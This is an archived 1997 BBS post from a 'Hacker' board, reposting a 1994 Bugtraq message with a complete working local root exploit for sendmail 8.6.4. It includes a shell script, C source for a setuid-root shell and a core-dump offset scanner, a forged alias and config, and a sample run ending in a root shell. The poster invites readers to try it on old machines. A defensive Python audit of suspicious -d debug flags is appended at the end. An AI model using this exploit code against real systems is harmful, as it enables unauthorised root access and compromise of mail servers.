<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Author" content="Edward Fu">
<meta name="GENERATOR" content="Mozilla/4.05 [zh-CN] (X11; I; Linux 2.1.127 i686) [Netscape]">
<title>Freesoft Linux FAQ -- A security hole in old versions of sendmail</title>
</head>
<body>
From: yuhj (勇?戒痴·戒躁·戒网),
Board: Hacker
<br>Subject: Sendmail 8.6.4 - Obtain a root shell
<br>Posted from: BBS 水木清华站 (Fri Jul 11 08:21:09 1997)
<br>
<br>The sendmail problem is not "one" problem; because of its special position, many versions have bugs. It is not a question of which bug, but of which version has which bug. Below is an article I copied more or less at random from http://shadowchill.com/; it must be quite old by now (we are currently running 8.8.7 beta2), but perhaps some old machine is still running this version, so you can give it a try.
<br>
<br>**************************************************************************
<br> HACK: Sendmail 8.6.4: Program and script to obtain a root shell
<br> System: Unix
<br> Source: james abendchan (jwa@naucse.cse.nau.edu) from Bugtraq
<br>**************************************************************************
<br>
<br>What follows is a sample run exercising the latest sendmail hole and the script used to exploit this hole. This is a re-send; I neglected to escape the "." in the sendmail script, leaving the program slightly truncated. To fix this, I have escaped the . so prior to executing this you must remove the \. (does that make any sense? :-) There was also a small problem with nested quotes pointed out by Peter Wemm which I have fixed.
<br>
<br>This is the "small version" of the script; it assumes you have a sane sendmail.cf. In this manner, it is not a particularly robust "breakin script" but I believe it does illustrate how to exploit the bug.
<br>
<br>This program uses "calc.c," the program mentioned by Timothy Newsham in an earlier message. The program has been modified slightly so that it gives better results (it would occasionally fail to locate the offset of a config given a buggy sendmail. The fix is to force a sync() after it generates a coredump.) The remainder of the program was written by myself and a fellow student, Steven Dake.
<br>
<br>We have held off on releasing this script until we were able to notify the people responsible for system security at NAU. Locals subscribing to this digest beware; sendmail on our machines has been patched! :-)
<br>
<pre>
Script started on Thu Mar 24 00:54:54 1994
[pine] [1] date
Thu Mar 24 00:54:57 MST 1994
[pine] [2] whoami
jwa
[pine] [3] id
uid=4473(jwa) gid=400(student)
[pine] [4] ls -l sendbug.sh
-rwx------ 1 jwa student 4893 Mar 24 00:46 sendbug.sh*
[pine] [5] sendbug.sh
Creating setid0 ...
Creating calc...
Scanning core image for /nau/local/lib/mail/sendmail.cf...
Creating alias.sh ...
Creating fake alias file...
Faking alias pointer in new config file...
Creating the sendmail script...
Executing /usr/lib/sendmail -d4294935548.47,4294935549.116,4294935550.109,4294935551.112,4294935552.47,4294935553.115,4294935554.109,4294935555.46,4294935556.9
Version 8.6.4
220-pine.cse.nau.edu Sendmail 8.6.4/WHOOP-v1.0 ready at Thu, 24 Mar 1994 00:55:21 -0700
220 ESMTP spoken here
250 pine.cse.nau.edu Hello jwa@localhost, pleased to meet you
250 <nobody>... Sender ok
250 <yash>... Recipient ok
354 Enter mail, end with "." on a line by itself
250 AAA01803 Message accepted for delivery
503 Need MAIL before RCPT
503 Need MAIL command
500 Command unrecognized
500 Command unrecognized
221 pine.cse.nau.edu closing connection
setid0 is a suid shell. executing...
executing /bin/csh...
pine# whoami
root
pine# id
uid=0(root) gid=0(root)
pine# exit
pine# end of script.
</pre>
<br>
<br>.. and here's the program.
<br>
<pre>
#!/bin/sh
# exploit new sendmail bug to give us a root shell
# 24 mar 94 jwa/scd @nau.edu
# "short version"
# tested on sunos 5.2/sendmail 8.6.4

# location of sendmail
SENDMAIL=/usr/lib/sendmail

# location of original sendmail.cf file
CONFIG=/nau/local/lib/mail/sendmail.cf
#CONFIG=`strings $SENDMAIL | grep sendmail.cf`

# program to execute as root
SHELL=/bin/csh

TEMPDIR=/tmp/sendbug-tmp.$$
mkdir $TEMPDIR
chmod 700 $TEMPDIR
cd $TEMPDIR

cp $SENDMAIL sm
chmod 700 sm

echo "Creating setid0 ..."
cat > setid.c << _EOF_

/* set uid to zero, thus escaping the annoying csh and solaris sh
 * problem..
 *
 * if (getuid() != geteuid()) {
 * printf("permission denied, you root-hacker you.\n");
 * exit(1);
 * }
 *
 * .. must be run euid 0, obviously. with no args it runs /bin/sh,
 * otherwise it runs the 1st arg.
 */

#include <stdio.h>

main(argc, argv)
int argc;
char *argv[];

 int uid;

 setuid(0);
 setgid(0);
 seteuid(0); /* probabally redundant. */
 setegid(0);

 uid = getuid();

 if (uid != 0) {
 printf("setuid(0); failed! aborting..\n");
 exit(1);
 }

 if (argc !=2) {
 printf("executing /bin/sh...\n");
 system("/bin/sh");
 }
 else
 {
 printf("executing %s...\n", argv[1]);
 system(argv[1]);
 }

_EOF_

cc -o setid0 setid.c

echo "Creating calc..."

cat > calc.c << _EOF_
/*
 * Determines offset in sendmail of
 * sendmail.cf file location.
 * author: timothy newsham
 */
#include <fcntl.h>

gencore()

 int pid;
 int fd[2];

 if(pipe(fd) < 0) {
 perror("pipe");
 exit(1);
 return(0);
 }
 pid = fork();
 if(!pid) {
 int f = open("./out", O_RDWR|O_CREAT, 0666);
 dup2(f, 1); dup2(fd[0], 0);
 close(f); close(fd[1]); close(fd[0]);
 execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
 perror("exec");
 exit(0);
 } else {
 sleep(2);
 kill(pid, 11);
 }
 close(fd[0]);
 close(fd[1]);


main(argc,argv)
char **argv;
int argc;

 unsigned int ConfFile,tTdvect,off;

 gencore();
 sync(); /* grr. */
 tTdvect = find("ZZZZZZZZ", "core");
 ConfFile = find(argv[1], "core");
 if(!tTdvect || !ConfFile) {
 return(1);

 }
 off = ConfFile - tTdvect;

 printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n",
 off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's', \
 off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10);


int find(pattern, file)
char *pattern,*file;

 int fd;
 int i, addr;
 char c;

 fd = open(file, 0);

 i = 0;
 addr = 0;
 while(read(fd, &c, 1) == 1) {
 if(pattern[i] == c)
 i++;
 else
 i=0;
 if(pattern[i] == '\0') {
 addr -= strlen(pattern);
 return(addr);
 }
 addr++;
 }
 return(0);

_EOF_
cc calc.c -o calc

echo "Scanning core image for $CONFIG..."

DEBUGFLAGS=`calc $CONFIG`

echo "Creating alias.sh ..."
echo "#!/bin/sh
# this program will be executed when mail is sent to the fake alias.
# since solaris sh and csh and tcsh refuse to run when euid != realuid,
# we instead run the program we compiled above.

/bin/chmod 6777 $TEMPDIR/setid0
/bin/chown root $TEMPDIR/setid0
/bin/sync

" > alias.sh

chmod 755 alias.sh

echo "Creating fake alias file..."
echo "yash: |$TEMPDIR/alias.sh" > aliases

echo "Faking alias pointer in new config file..."
egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf
echo "
# hacks follow

OA/$TEMPDIR/aliases # our fake alias file
Ou0 # user ID to run as
Og0 # group ID to run as
DZWHOOP-v1.0" >> /tmp/sm.cf

echo "Creating the sendmail script..."

cat > sendmail.script << _EOF_
helo
mail from: <nobody>
rcpt to: <yash>
data
yet another sendmail hole? suid whoop?
\. # oops.. delete \ prior to execution
quit
_EOF_

echo "Executing $SENDMAIL $DEBUGFLAGS -bs..."

$SENDMAIL $DEBUGFLAGS -bs < sendmail.script

# give it time to execute.
sleep 4

# cleanup in 5 seconds
(sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) &

if [ -u setid0 ]
then
 echo "setid0 is a suid shell. executing..."
 cd /
 $TEMPDIR/setid0 /bin/csh
 echo "end of script."
 exit 0
else
 echo "setid0 is not suid; script failed."
 echo "apparently, you don't have the bug. celebrate :-)"
 exit 1
fi
</pre>
<br>
<br>--
<br>
<br>
Because at that time I did not yet understand it very well.
<br>
<br>※ Edited: yuhj edited this post at Jul 11 08:23:27 [FROM: wpi.WPI.EDU]
<br>※ Edited: yuhj edited this post at Jul 11 08:24:33 [FROM: wpi.WPI.EDU]
<br>※ Source: BBS 水木清华站 bbs.net.tsinghua.edu.cn [FROM: wpi.WPI.EDU]
<br>
<br>
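The run quoted above works because sendmail 8.6.4 indexed its trace-level table (tTdvect) with the category number from -d without a bounds check, so a huge category wraps to a negative offset and the "level" byte lands elsewhere in the data segment (the calc.c output aims it at the sendmail.cf path). The following Python audit is an added example, not part of yuhj's post or of the quoted Bugtraq message: it parses sendmail's comma-separated "first[-last][.level]" -d syntax, flags any category outside the table, and reconstructs the byte string a sequence of such writes would plant, which is what a defender reviewing process-accounting or audit-log command lines would want to see. The table size of 100 is an assumption about that historical release, and the sample command lines are constructed here (the flag values are what calc.c's printf would emit for an offset of 4294935548).

```python
"""Audit sendmail command lines for out-of-range -d (debug) categories."""
import re
from typing import Any, Dict, List

# sendmail 8.6 kept 100 trace categories; anything at or above this index is
# outside the table. The size is an assumption about that historical release.
TT_SIZE = 100
U32 = 2 ** 32

# sendmail's -d syntax: comma-separated "first[-last][.level]"
_SPEC_RE = re.compile(r"^(\d+)(?:-(\d+))?(?:\.(\d+))?$")


def parse_debug_flag(flag: str) -> List[Dict[str, int]]:
    """Split '-d0-9.90' or '-d11.1,12.3' into (first, last, level) settings."""
    spec = flag[2:] if flag.startswith("-d") else flag
    settings = []
    for item in spec.split(","):
        m = _SPEC_RE.match(item)
        if not m:
            raise ValueError(f"malformed debug spec: {item!r}")
        first = int(m.group(1))
        last = int(m.group(2)) if m.group(2) else first
        level = int(m.group(3)) if m.group(3) else 1  # sendmail defaults to 1
        settings.append({"first": first, "last": last, "level": level})
    return settings


def audit_debug_flag(flag: str) -> Dict[str, Any]:
    """Report categories outside tTdvect and the bytes their levels would write."""
    out_of_range = [s for s in parse_debug_flag(flag) if s["last"] >= TT_SIZE]
    written = []
    for s in out_of_range:
        if s["level"] == 0:  # a NUL level terminates whatever string is planted
            break
        written.append(chr(s["level"]) if 32 <= s["level"] < 127 else "?")
    # show each index as the signed 32-bit value the unchecked array access used
    signed = [s["first"] - U32 if s["first"] >= U32 // 2 else s["first"]
              for s in out_of_range]
    return {
        "suspicious": bool(out_of_range),
        "out_of_range": len(out_of_range),
        "signed_offsets": signed,
        "written_bytes": "".join(written),
    }


def audit_command_line(cmdline: str) -> List[Dict[str, Any]]:
    """Audit every -d argument on one sendmail command line (as recorded by
    process accounting or an audit log); returns one finding per bad flag."""
    findings = []
    for tok in cmdline.split():
        if tok.startswith("-d") and len(tok) > 2 and tok[2].isdigit():
            try:
                result = audit_debug_flag(tok)
            except ValueError:
                result = {"suspicious": True, "error": "unparseable -d flag"}
            if result["suspicious"]:
                result["flag"] = tok
                findings.append(result)
    return findings


# Constructed sample command lines (not taken from a real log). The last one
# carries the eleven entries calc.c would print for an offset of 4294935548.
SAMPLE_LINES = [
    "/usr/lib/sendmail -bd -q30m",
    "./sm -d0-9.90 -oQ. -bs",
    "/usr/lib/sendmail -d4294935548.47,4294935549.116,4294935550.109,"
    "4294935551.112,4294935552.47,4294935553.115,4294935554.109,"
    "4294935555.46,4294935556.99,4294935557.102,4294935558.0 -bs",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        for f in audit_command_line(line):
            print(f"{line[:40]}...: {f['out_of_range']} categories outside "
                  f"tTdvect, would write {f['written_bytes']!r} starting at "
                  f"offset {f['signed_offsets'][0]}")
```

The first two sample lines produce no findings (a daemon start and the in-range -d0-9.90 that calc.c itself uses to provoke a core dump); the third is reported with eleven out-of-range categories whose levels spell "/tmp/sm.cf", starting at signed offset -31748. The same check ports directly to a log-parsing rule: any -d category at or above the table size on a release without the bounds check is worth an alert on its own, independent of what bytes it writes.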
</body>
</html>